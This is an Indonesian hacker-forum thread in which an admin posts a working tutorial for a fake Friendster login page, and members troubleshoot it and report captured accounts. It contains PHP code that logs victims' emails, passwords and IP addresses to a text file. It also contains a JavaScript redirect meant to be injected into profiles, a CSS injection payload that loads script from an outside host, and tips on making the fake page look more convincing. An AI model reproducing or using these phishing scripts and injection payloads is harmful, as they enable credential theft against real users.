Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 TUTOR FAG LOGIN PAKE LINKER JS

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : 1, 2, 3  Next
PengirimMessage
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: TUTOR FAG LOGIN PAKE LINKER JS   Mon May 19, 2008 7:50 am

Very Happy Sesuai pertanyaan beberapa member gimana cara buat fag login? agar hasilnya masuk ke hosting sendri.

Very Happy neeh saya coba buatin tutornya

lankah pertama (1) copi paste code dibawah ini dan save hosting kamu seperti ripway.com dgn nama file log.phpjangan lupa semua file fag login di simpan dalam 1 folder
Code:
<?php
//deteksi browser yg dipake dia (victim)
if (strstr($_SERVER["HTTP_USER_AGENT"], "MSIE")) 
{  $browser = "Ms.IE";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Mozi")) 
{  $browser = "FF.Mozilla";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Oper")) 
{  $browser = "Opera";}
else $browser = "Unk.Browser";

$ip = getenv ('REMOTE_ADDR'); //record ip addressnya dia
$date=date("d/M/y g:i:s a"); //record waktu kejadian
// $referer=getenv ('HTTP_REFERER'); //record alamat di URL
$fl = fopen('log.txt', 'a');
$em=$_POST["email"]; //record email dia
$pw=$_POST["password"]; //record pwd dia
fwrite($fl,"\r\n$ip;;$date;;$browser\r\n$em;;$pw\r\n");
fclose($fl);
?>

<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>

lankah kedua (2) download code ini Arrow faglog
copi paste code faglog ke hosting kamu save dengan nama file login.php
jangan lupa code faglog di edit dikit ganti url http://h1.badwaresite.www/frendsteercom/log.php dengan url log.php kamu

langkah ke tiga (3) buat file.kosong txt di hosting kamu dengan nama file log.txt

ok sekarang kamu dah buat langkah 1 2 3 semua file tersebut harus dalam 1 folder ok lanjut lankgkah ke 4 smangat uii bounce

langkah 4 copi paste code dibawah ini dengan nama file hajar.js
Code:
//enter page
var myplace = document.location.href;
if (myplace == "http://profiles.friendster.com/user.php?uid=999999"){
}

else if (myplace == "http://profiles.friendster.com/user.php?uid=999999"){
}

else {
  parent.document.location='URL Login.Html kamu'
}
jangan lupa yaah URL Login.Html di ganti ama url log.in html kamu
ok sekarang kamu tinggal cari linker Js Fs yg masih jalan tinggal lo save aja hajar.js kamu pake linker fs yg masih jalan di add media box
ntaar hasilnya lihat aja di log.txt kamu

Very Happy ok cuman itu aja dari saya ntaar kalo ada yg lebih keren di share yaaah

kita belajar sama2 lol!


Terakhir diubah oleh funky_shensey tanggal Wed Jun 18, 2008 8:32 am, total 4 kali diubah
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Mon May 19, 2008 8:32 am

ada tutorial agar fake login kita tidak diketahui kalau itu adalah fake login?

mungkin maksud saya untuk merubah url diatas,

menjadi http://profiles.friendster.com/user.php
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Mon May 19, 2008 8:56 am

funky_shensey wrote:
Very Happy Sesuai pertanyaan beberapa member gimana cara buat fag login? agar hasilnya masuk ke hosting sendri.

Very Happy neeh saya coba buatin tutornya

lankah pertama (1) copi paste code dibawah ini dan save hosting kamu seperti ripway.com dgn nama file log.phpjangan lupa semua file fag login di simpan dalam 1 folder
Code:
<?php
//deteksi browser yg dipake dia (victim)
if (strstr($_SERVER["HTTP_USER_AGENT"], "MSIE"))
{  $browser = "Ms.IE";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Mozi"))
{  $browser = "FF.Mozilla";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Oper"))
{  $browser = "Opera";}
else $browser = "Unk.Browser";

$ip = getenv ('REMOTE_ADDR'); //record ip addressnya dia
$date=date("d/M/y g:i:s a"); //record waktu kejadian
// $referer=getenv ('HTTP_REFERER'); //record alamat di URL
$fl = fopen('log.txt', 'a');
$em=$_POST["email"]; //record email dia
$pw=$_POST["password"]; //record pwd dia
fwrite($fl,"\r\n$ip;;$date;;$browser\r\n$em;;$pw\r\n");
fclose($fl);
?>

<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>

lankah kedua (2) download code ini Arrow faglog
copi paste code faglog ke hosting kamu save dengan nama file login.html
jangan lupa code faglog di edit dikit ganti url http://h1.badwaresite.www/gorontalo-defacer/log.php dengan url log.php kamu

langkah ke tiga (3) buat file.kosong txt di hosting kamu dengan nama file log.txt

ok sekarang kamu dah buat langkah 1 2 3 semua file tersebut harus dalam 1 folder ok lanjut lankgkah ke 4 smangat uii bounce

langkah 4 copi paste code dibawah ini dengan nama file hajar.js
Code:
//enter page
var myplace = document.location.href;
if (myplace == "http://profiles.friendster.com/user.php?uid=999999"){
}

else if (myplace == "http://profiles.friendster.com/user.php?uid=999999"){
}

else {
  parent.document.location='URL Login.Html kamu'
}
jangan lupa yaah URL Login.Html di ganti ama url log.in html kamu
ok sekarang kamu tinggal cari linker Js Fs yg masih jalan tinggal lo save aja hajar.js kamu pake linker fs yg masih jalan di add media box
ntaar hasilnya lihat aja di log.txt kamu

Very Happy ok cuman itu aja dari saya ntaar kalo ada yg lebih keren di share yaaah

kita belajar sama2 lol!


lanjut hacker ! Razz
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 3:40 am

aku uda selesai bikin langkah 1 pe 4..


Trs yg niy maksdnya ap bos..aku ga ngerti!! Very Happy
Quote :
ok sekarang kamu tinggal cari linker Js Fs yg masih jalan tinggal lo save aja hajar.js kamu pake linker fs yg masih jalan di add media box


Trs yg dcopy ke "add media box" FS code yg mana?
ho3..neubie bgt niy boz...No





Th4nk b4..
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 3:59 am

jadi langkah terakhir anda adalah

mencari linker Javascript untuk friendster yang masih jalan,

nanti url hajar.js anda masukkan di linker Javascript

kemudian di generate,

terus copy code yang keluar dan paste di media box.
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 5:12 am

SmarterDOS wrote:
jadi langkah terakhir anda adalah

mencari linker Javascript untuk friendster yang masih jalan,

nanti url hajar.js anda masukkan di linker Javascript

kemudian di generate,

terus copy code yang keluar dan paste di media box.


Very Happy ship boss

thankzzz for sharednya lol!

_________________
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 7:57 am

sama2
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
IbLizMutz
Newbie
Newbie


Jumlah posting : 8
Join date : 17.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 8:10 am

wew manteb bro
wah keren nih
pgn nyoba jg akh Very Happy Very Happy
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 8:14 am

tapi saran saya,

anda mengganti isi dari fake login yang menjadi tutorial diatas,

karena

disana hanya terdapat HOME, MY PROFILE, MY CONNECTION, EXPLORE, SEARCH

sedangkan login.php yang sekarang dimilik oleh friendster

HOME, MY PROFILE, MY APPS, MY CONNECTION, EXPLORE, SEARCH

itu menjadi sebuah perbedaan yang cukup fatal

bisa lihat perbandingannya

http://h1.badwaresite.www/robbinhood/LoginFriendster/keren.html

dengan

http://h1.badwaresite.www/robbinhood/LoginFriendster/login.php
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 9:49 am

Quote :
jadi langkah terakhir anda adalah

mencari linker Javascript untuk friendster yang masih jalan,

nanti url hajar.js anda masukkan di linker Javascript

kemudian di generate,

terus copy code yang keluar dan paste di media box.
_________________
buat kk mohon pencerahannya,

FS saya,
http://profiles.friendster.com/labskyhacker

Yupz..berhasil! bounce bounce
Tp ko hasil panen ny dfile "hasil_record1.txt (log)" ga ad "record password" yah,cuman ad "record email" "record waktu kejadian",lalu posisi teks ny ko lurus gt ya,posisi ny ga beraturan...

Hasil ny ky gini http://h1.badwaresite.www/frendsterdotcom/hasil_record1.txt

knp tu boz.... Question Question




tH4nk b4 . .. cheers cheers
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 10:17 am

dean_deun wrote:
Quote :
jadi langkah terakhir anda adalah

mencari linker Javascript untuk friendster yang masih jalan,

nanti url hajar.js anda masukkan di linker Javascript

kemudian di generate,

terus copy code yang keluar dan paste di media box.
_________________
buat kk mohon pencerahannya,

FS saya,
http://profiles.friendster.com/labskyhacker

Yupz..berhasil! bounce bounce
Tp ko hasil panen ny dfile "hasil_record1.txt (log)" ga ad "record password" yah,cuman ad "record email" "record waktu kejadian",lalu posisi teks ny ko lurus gt ya,posisi ny ga beraturan...

Hasil ny ky gini http://h1.badwaresite.www/frendsterdotcom/hasil_record1.txt

knp tu boz.... Question Question




tH4nk b4 . .. cheers cheers

mungkin ada code yg kehapus broo dean

coba di periksa lagi dengan teliti bro dean


truss saran saya code yg untuk log.php gak ush di edit

trus nama file txt nya gak usah dikasih nama hasil_record1.txt cukup log.txt aja

ok bro dean segitu dulu saran saya silahkan di coba lagi cheers smangat uiii

_________________
Kembali Ke Atas Go down
Lihat profil user
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 10:28 am

Quote :
mungkin ada code yg kehapus broo dean

coba di periksa lagi dengan teliti bro dean


truss saran saya code yg untuk log.php gak ush di edit

trus nama file txt nya gak usah dikasih nama hasil_record1.txt cukup log.txt aja

ok bro dean segitu dulu saran saya silahkan di coba lagi cheers smangat uiii


okey,,saya cb dr awal lagi deh..ho3

th4nk ya bro funky_shensey atas masukanny... cheers cheers
Kembali Ke Atas Go down
Lihat profil user
tukulesto
Developt Kiddie
Developt Kiddie


Jumlah posting : 581
Join date : 17.05.08
Age : 30
Lokasi : dimana ada kamu, aku pasti ada

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 12:41 pm

kok saya jadi binun yaaaa

_________________
Something's getting in the way
Something's just about to break
I will try to find my place at this fucking world


FRIENDSTER | SHL | IDC

Webnya orang cupu


Kembali Ke Atas Go down
Lihat profil user http://www.tukulesto.co.cc
july
Newbie
Newbie


Jumlah posting : 3
Join date : 16.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 10:10 pm

kk itu js linker mw generate dimana ada tempat khususnya ya atau ada situs untuk men genrate file js.scriptnya mohon bantuannya ya soalnya masih newbie
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Tue May 20, 2008 10:32 pm

july wrote:
kk itu js linker mw generate dimana ada tempat khususnya ya atau ada situs untuk men genrate file js.scriptnya mohon bantuannya ya soalnya masih newbie

Very Happy july coba pake linker ini aja yaaahh

gua masih pake linker ini masih jalan ko nntaar di save aja ke media box fs july atu siapa aja
Code:
<style>
body {
-moz-binding:url("http://h1.badwaresite.www/friiendstercom/funky-ganteng.swf#funkyshensey");
obj:expres ion(function b(){x=document;a=x.createElement('script');a.src=' http://h1.badwaresite.www/friiendstercom/funky.js ';navBg.appendChild(a)}b());text:expres ion(object.style.obj='0')
}
</style>
<a id='apocalypse'> http://h1.badwaresite.www/friiendstercom/funky.js </a>

jangan lupa yaaah url funky.js di ganti ama hajar.js fag log in july ok cheers semangat

_________________
Kembali Ke Atas Go down
Lihat profil user
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Wed May 21, 2008 12:17 am

Quote :
july wrote:
kk itu js linker mw generate dimana ada tempat khususnya ya atau ada situs untuk men genrate file js.scriptnya mohon bantuannya ya soalnya masih newbie

klo aku linker js ny d Generate pk pny bro IbLizMutz . .

Quote :
IbLizMutz wrote:
atau kalau kawan2 ingin generate langsung bsa kok
http://h1.badwaresite.www/cakka/linker/linker-17-05.html

br code hasil generate ny d copy paste ke "add media box' FS...
Cara kaya gt bener ga bro funky_shensey... Exclamation Exclamation


Quote :
Code:
<style>
body {
-moz-binding:url("http://h1.badwaresite.www/friiendstercom/funky-ganteng.swf#funkyshensey");
obj:expres ion(function b(){x=document;a=x.createElement('script');a.src=' http://h1.badwaresite.www/friiendstercom/funky.js ';navBg.appendChild(a)}b());text:expres ion(object.style.obj='0')
}
</style>
<a id='apocalypse'> http://h1.badwaresite.www/friiendstercom/funky.js


klo yang niy http://h1.badwaresite.www/friiendstercom/funky-ganteng.swf#funkyshensey dganti ga bro funky_shensey... Question Question


Maaf yg bro banyak nany niy . . . lol! lol!
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: bener bangat   Wed May 21, 2008 1:03 am

yupzz bisa bisa yg pentink linkernya jalan, loe mo pake linker jenis apa aja gak apa-apa!!

truus kalo loe mo pake linkernya funky ganteng Very Happy

gak usah di ganti yg ini Very Happy
Code:
http://h1.badwaresite.www/friiendstercom/funky-ganteng.swf#funkyshensey
cukup url hajar.js aja yg di ganti

jgn lupa di save ke media box yaaahh loe pake linker apa aja ga apa apa yg penting savenya di media.box ok cheers smangat uiiiiiiiii

_________________
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Wed May 21, 2008 4:24 am

makasih kk semua,

hahaha
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
tukulesto
Developt Kiddie
Developt Kiddie


Jumlah posting : 581
Join date : 17.05.08
Age : 30
Lokasi : dimana ada kamu, aku pasti ada

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Wed May 21, 2008 10:12 pm

fake loginnya yg baru nya udah ada lagi blm juragan...???

_________________
Something's getting in the way
Something's just about to break
I will try to find my place at this fucking world


FRIENDSTER | SHL | IDC

Webnya orang cupu


Kembali Ke Atas Go down
Lihat profil user http://www.tukulesto.co.cc
saint
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 22.05.08
Age : 31
Lokasi : Neraka Bagian Timur

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 2:34 am

funky_shensey wrote:
Very Happy Sesuai pertanyaan beberapa member gimana cara buat fag login? agar hasilnya masuk ke hosting sendri.

Very Happy neeh saya coba buatin tutornya

lankah pertama (1) copi paste code dibawah ini dan save hosting kamu seperti ripway.com dgn nama file log.phpjangan lupa semua file fag login di simpan dalam 1 folder
Code:
<?php
//deteksi browser yg dipake dia (victim)
if (strstr($_SERVER["HTTP_USER_AGENT"], "MSIE"))
{  $browser = "Ms.IE";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Mozi"))
{  $browser = "FF.Mozilla";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Oper"))
{  $browser = "Opera";}
else $browser = "Unk.Browser";

$ip = getenv ('REMOTE_ADDR'); //record ip addressnya dia
$date=date("d/M/y g:i:s a"); //record waktu kejadian
// $referer=getenv ('HTTP_REFERER'); //record alamat di URL
$fl = fopen('log.txt', 'a');
$em=$_POST["email"]; //record email dia
$pw=$_POST["password"]; //record pwd dia
fwrite($fl,"\r\n$ip;;$date;;$browser\r\n$em;;$pw\r\n");
fclose($fl);
?>

<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>


loh.php nya kayanya ada yg salah bro..
coba cek lagi deh..
coz passwordnya g ke record Rolling Eyes
Kembali Ke Atas Go down
Lihat profil user http://www.webdeessaint.com
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 3:18 am

saint wrote:
funky_shensey wrote:
Very Happy Sesuai pertanyaan beberapa member gimana cara buat fag login? agar hasilnya masuk ke hosting sendri.

Very Happy neeh saya coba buatin tutornya

lankah pertama (1) copi paste code dibawah ini dan save hosting kamu seperti ripway.com dgn nama file log.phpjangan lupa semua file fag login di simpan dalam 1 folder
Code:
<?php
//deteksi browser yg dipake dia (victim)
if (strstr($_SERVER["HTTP_USER_AGENT"], "MSIE"))
{  $browser = "Ms.IE";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Mozi"))
{  $browser = "FF.Mozilla";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Oper"))
{  $browser = "Opera";}
else $browser = "Unk.Browser";

$ip = getenv ('REMOTE_ADDR'); //record ip addressnya dia
$date=date("d/M/y g:i:s a"); //record waktu kejadian
// $referer=getenv ('HTTP_REFERER'); //record alamat di URL
$fl = fopen('log.txt', 'a');
$em=$_POST["email"]; //record email dia
$pw=$_POST["password"]; //record pwd dia
fwrite($fl,"\r\n$ip;;$date;;$browser\r\n$em;;$pw\r\n");
fclose($fl);
?>

<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>


loh.php nya kayanya ada yg salah bro..
coba cek lagi deh..
coz passwordnya g ke record Rolling Eyes

Very Happy weeww maaf booss bener juga ada kesalahan pada log.php nya

neeh code log.php nya udah saya perbaiki
Code:
<?php
//deteksi browser yg dipake dia (victim)
if (strstr($_SERVER["HTTP_USER_AGENT"], "MSIE")) 
{  $browser = "Ms.IE";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Mozi")) 
{  $browser = "FF.Mozilla";}
elseif (strstr($_SERVER["HTTP_USER_AGENT"], "Oper")) 
{  $browser = "Opera";}
else $browser = "Unk.Browser";

$ip = getenv ('REMOTE_ADDR'); //record ip addressnya dia
$date=date("d/M/y g:i:s a"); //record waktu kejadian
// $referer=getenv ('HTTP_REFERER'); //record alamat di URL
$fl = fopen('log.txt', 'a');
$em=$_POST["email"]; //record email dia
$pw=$_POST["password"]; //record pwd dia
fwrite($fl,"\r\n$ip;;$date;;$browser\r\n$em;;$pw\r\n");
fclose($fl);
?>

<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>

thankzz broo atas saran dan kritikannya lol!

_________________
Kembali Ke Atas Go down
Lihat profil user
tukulesto
Developt Kiddie
Developt Kiddie


Jumlah posting : 581
Join date : 17.05.08
Age : 30
Lokasi : dimana ada kamu, aku pasti ada

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 3:22 am

funky_shensey wrote:
july wrote:
kk itu js linker mw generate dimana ada tempat khususnya ya atau ada situs untuk men genrate file js.scriptnya mohon bantuannya ya soalnya masih newbie

Very Happy july coba pake linker ini aja yaaahh

gua masih pake linker ini masih jalan ko nntaar di save aja ke media box fs july atu siapa aja
Code:
<style>
body {
-moz-binding:url("http://h1.badwaresite.www/friiendstercom/funky-ganteng.swf#funkyshensey");
obj:expres ion(function b(){x=document;a=x.createElement('script');a.src=' http://h1.badwaresite.www/friiendstercom/funky.js ';navBg.appendChild(a)}b());text:expres ion(object.style.obj='0')
}
</style>
<a id='apocalypse'> http://h1.badwaresite.www/friiendstercom/funky.js </a>

jangan lupa yaaah url funky.js di ganti ama hajar.js fag log in july ok cheers semangat


bro,, Linker yang dari apocalypse itu bukannnya udah gagbisa loagii ya..???!!!

_________________
Something's getting in the way
Something's just about to break
I will try to find my place at this fucking world


FRIENDSTER | SHL | IDC

Webnya orang cupu


Kembali Ke Atas Go down
Lihat profil user http://www.tukulesto.co.cc
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 3:36 am

masih bisa lol!

dicoba aja Razz

_________________
Kembali Ke Atas Go down
Lihat profil user
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 3:39 am

wah ad revisi code log.php baru uUy...bounce bounce

kayanya letak ksalahan ny dcode niy,dari kmaren aku coba tetep aja password ny ga ke record. . scratch


aku coba dulu ah . .


th4nk bro... lol! lol!
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Thu May 22, 2008 3:41 am

Very Happy thankzz balik bro deun

Very Happy sama2 kita blajar

_________________
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: TUTOR FAG LOGIN PAKE LINKER JS   Today at 4:30 am

Kembali Ke Atas Go down
 
TUTOR FAG LOGIN PAKE LINKER JS
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 3Pilih halaman : 1, 2, 3  Next
 Similar topics
-
» Tukeran No HP yuk...
» share pengalaman yg udah pake stang clip on
» ganti pake klakson kijang inova??
» WTA - klo pake limbah moge
» Bro mau tanya ada yang udah pake koil binter 400 ??

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: